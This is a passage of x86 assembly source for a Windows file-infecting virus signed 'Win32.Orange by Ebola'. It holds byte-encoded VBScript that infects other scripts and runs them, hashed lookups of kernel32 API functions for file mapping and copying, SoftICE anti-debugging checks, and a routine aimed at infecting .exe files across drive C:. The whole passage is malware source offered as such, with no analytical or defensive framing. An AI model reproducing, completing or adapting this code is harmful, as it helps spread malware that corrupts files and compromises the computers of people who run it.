db 111,112,101,110,116,101,120,116,102,105,108,101,40,115,40,48
|
||
|
db 41,44,49,41,13,10,9,9,118,105,32,61,32,102,46,82
|
||
|
db 101,97,100,65,108,108,13,10,9,9,102,46,99,108,111,115
|
||
|
db 101,13,10,9,9,83,101,116,32,102,32,61,32,78,111,116
|
||
|
db 104,105,110,103,13,10,13,10,9,9,83,101,116,32,102,32
|
||
|
db 61,32,102,115,46,99,114,101,97,116,101,116,101,120,116,102
|
||
|
db 105,108,101,40,34,36,116,116,121,107,36,46,118,98,95,34
|
||
|
db 41,13,10,9,13,10,9,9,73,102,32,73,110,83,116,114
|
||
|
db 40,49,44,118,105,44,34,118,98,115,78,101,99,116,111,114
|
||
|
db 34,44,49,41,32,84,104,101,110,13,10,9,9,9,69,120
|
||
|
db 105,116,32,83,117,98,13,10,9,9,69,110,100,32,73,102
|
||
|
db 13,10,9,13,10,9,9,110,116,116,32,61,32,73,110,83
|
||
|
db 116,114,40,49,44,118,105,114,44,34,39,34,44,49,41,13
|
||
|
db 10,9,13,10,9,9,102,46,119,114,105,116,101,32,34,99
|
||
|
db 97,108,108,32,118,98,115,78,101,99,116,111,114,34,32,43
|
||
|
db 32,118,98,67,114,76,102,13,10,9,9,102,46,119,114,105
|
||
|
db 116,101,32,118,105,32,43,32,118,98,67,114,76,102,13,10
|
||
|
db 9,9,102,46,119,114,105,116,101,32,77,105,100,40,118,105
|
||
|
db 114,44,110,116,116,44,76,101,110,40,118,105,114,41,45,110
|
||
|
db 116,116,41,13,10,9,9,9,13,10,9,9,102,46,99,108
|
||
|
db 111,115,101,13,10,9,9,83,101,116,32,102,32,61,32,78
|
||
|
db 111,116,104,105,110,103,13,10,9,13,10,9,9,111,98,106
|
||
|
db 83,104,101,108,108,46,82,117,110,32,115,40,49,41,13,10
|
||
|
db 9,9,102,115,46,67,111,112,121,70,105,108,101,32,34,36
|
||
|
db 116,116,121,107,36,46,118,98,95,34,44,115,40,48,41,13
|
||
|
db 10,69,110,100,32,73,102,13,10,69,110,100,32,83,117,98
|
||
|
db 13,10
|
||
|
|
||
|
sizevbs dd 1042d
|
||
|
|
||
|
;----------------------------------------
|
||
|
; Different data we use ************
|
||
|
;----------------------------------------
|
||
|
|
||
|
CRC32_PROC dd 0FFC97C1Fh ; GetProcAddress
|
||
|
dd 04134D1ADh ; LoadLibraryA
|
||
|
dd 019F33607h ; CreateThread
|
||
|
dd 0AFDF191Fh ; FreeLibrary
|
||
|
dd 08C892DDFh ; CreateFileA
|
||
|
dd 0797B49ECh ; MapViewOfFile
|
||
|
dd 094524B42h ; UnmapViewOfFile
|
||
|
dd 096B2D96Ch ; CreateFileMappingA
|
||
|
dd 068624A9Dh ; CloseHandle
|
||
|
dd 0AE17EBEFh ; FindFirstFileA
|
||
|
dd 0AA700106h ; FindNextFileA
|
||
|
dd 0C200BE21h ; FindClose
|
||
|
dd 0FE248274h ; GetWindowsDirectoryA
|
||
|
dd 0593AE7CEh ; GetSystemDirectoryA
|
||
|
dd 0B2DBD7DCh ; SetCurrentDirectoryA
|
||
|
dd 0EBC6C18Bh ; GetCurrentDirectoryA
|
||
|
dd 0C38969C7h ; SetPriorityClass
|
||
|
dd 085859D42h ; SetFilePointer
|
||
|
dd 059994ED6h ; SetEndOfFile
|
||
|
dd 0C633D3DEh ; GetFileAttributesA
|
||
|
dd 03C19E536h ; SetFileAttributesA
|
||
|
dd 0EF7D811Bh ; GetFileSize
|
||
|
dd 0B99F1B1Eh ; GetDriveTypeA
|
||
|
dd 083A353C3h ; GlobalAlloc
|
||
|
dd 05CDF6B6Ah ; GlobalFree
|
||
|
dd 02E12ADB5h ; GlobalLock
|
||
|
dd 088BC746Eh ; GlobalUnlock
|
||
|
dd 052E3BEB1h ; IsDebuggerPresent
|
||
|
dd 0613FD7BAh ; GetTickCount
|
||
|
dd 0058F9201h ; ExitThread
|
||
|
dd 0D4540229h ; WaitForSingleObject
|
||
|
dd 040F57181h ; ExitProcess
|
||
|
dd 00AC136BAh ; Sleep
|
||
|
dd 021777793h ; WriteFile
|
||
|
dd 004DCF392h ; GetModuleFileNameA
|
||
|
dd 05BD05DB1h ; CopyFileA
|
||
|
dd 000000000h ; done mark.
|
||
|
|
||
|
|
||
|
; NumFunctions equ ($-CRC32_PROC)/4
|
||
|
|
||
|
GetProcAddress dd 0 ; GetProcAddress
|
||
|
LoadLibraryA dd 0 ; LoadLibraryA
|
||
|
CreateThread dd 0 ; CreateThread
|
||
|
FreeLibrary dd 0 ; FreeLibrary
|
||
|
CreateFileA dd 0 ; CreateFileA
|
||
|
MapViewOfFile dd 0 ; MapViewOfFile
|
||
|
UnmapViewOfFile dd 0 ; UnmapViewOfFile
|
||
|
CreateFileMappingA dd 0 ; CreateFileMappingA
|
||
|
CloseHandle dd 0 ; CloseHandle
|
||
|
FindFirstFileA dd 0 ; FindFirstFileA
|
||
|
FindNextFileA dd 0 ; FindNextFileA
|
||
|
FindClose dd 0 ; FindClose
|
||
|
GetWindowsDirectoryA dd 0 ; GetWindowsDirectoryA
|
||
|
GetSystemDirectoryA dd 0 ; GetSystemDirectoryA
|
||
|
SetCurrentDirectoryA dd 0 ; SetCurrentDirectoryA
|
||
|
GetCurrentDirectoryA dd 0 ; GetCurrentDirectoryA
|
||
|
SetPriorityClass dd 0 ; SetPriorityClass
|
||
|
SetFilePointer dd 0 ; SetFilePointer
|
||
|
SetEndOfFile dd 0 ; SetEndOfFile
|
||
|
GetFileAttributesA dd 0 ; GetFileAttributesA
|
||
|
SetFileAttributesA dd 0 ; SetFileAttributesA
|
||
|
GetFileSize dd 0 ; GetFileSize
|
||
|
GetDriveTypeA dd 0 ; GetDriveTypeA
|
||
|
GlobalAlloc dd 0 ; GlobalAlloc
|
||
|
GlobalFree dd 0 ; GlobalFree
|
||
|
GlobalLock dd 0 ; GlobalLock
|
||
|
GlobalUnlock dd 0 ; GlobalUnlock
|
||
|
IsDebuggerPresent dd 0 ; IsDebuggerPresent
|
||
|
GetTickCount dd 0 ; GetTickCount
|
||
|
ExitThread dd 0 ; ExitThread
|
||
|
WaitForSingleObject dd 0 ; WaitForSingleObject
|
||
|
ExitProcess dd 0 ; ExitProcess
|
||
|
Sleep dd 0 ; sleep
|
||
|
WriteFile dd 0
|
||
|
GetModuleFileNameA dd 0
|
||
|
CopyFileA dd 0
|
||
|
|
||
|
CurrentProc dd 0
|
||
|
TempName db 32 dup(0)
|
||
|
|
||
|
CurrentOS db 0
|
||
|
kernel dd 0
|
||
|
|
||
|
;** Used while searching for exports
|
||
|
NumberOfNames dd 0
|
||
|
ExportAddressRVA dd 0
|
||
|
ExportNameRVA dd 0
|
||
|
ExportOrdinalRVA dd 0
|
||
|
ExportCounter dd 0
|
||
|
|
||
|
;** Anti debugging etc
|
||
|
|
||
|
SoftICE_Win9X db "\\.\SICE",0
|
||
|
SoftICE_WinNT db "\\.\NTICE",0
|
||
|
|
||
|
;** Various
|
||
|
|
||
|
Buffer db 128 dup(0) ; current directory
|
||
|
Windows db 128 dup(0)
|
||
|
DirSize equ 128
|
||
|
|
||
|
FindData WIN32_FIND_DATA <0>
|
||
|
|
||
|
;** Hyper infection
|
||
|
|
||
|
DriveRoot db "c:\",0
|
||
|
FileMask db "*.exe",0
|
||
|
|
||
|
;** Misc useless shit
|
||
|
|
||
|
Signature db "[Win32.Orange by Ebola]",0
|
||
|
misc1 db "Dedicated to the NYFD and NYPD.",0
|
||
|
|
||
|
virus_end = $
|
||
|
end start
|
||
|
|